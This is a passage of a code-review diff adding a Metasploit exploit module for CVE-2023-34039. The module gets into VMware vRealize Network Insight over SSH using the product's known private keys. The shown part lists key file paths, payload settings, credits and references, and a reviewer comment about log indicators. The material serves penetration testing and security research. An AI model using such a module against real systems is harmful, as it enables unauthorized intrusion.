modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb

```diff
@@ -0,0 +1,190 @@
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector'),
+                  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform')
+                ]
+              }
+            ],
+          ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => [
+            'h00die', # MSF module
+            'SinSinology', # PoC
+            'Harsh Jaiswal (@rootxharsh)', # Discovery
+            'Rahul Maini (@iamnoooob)' # Discovery
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['CVE', '2023-34039'],
+            ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
+            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
+            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
+          ],
+          'DisclosureDate' => '2023-08-29',
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 22,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
```

Comment:
IOC_IN_LOGS, no? Since something like "authentication successful for user 'support'" should show up in the syslog.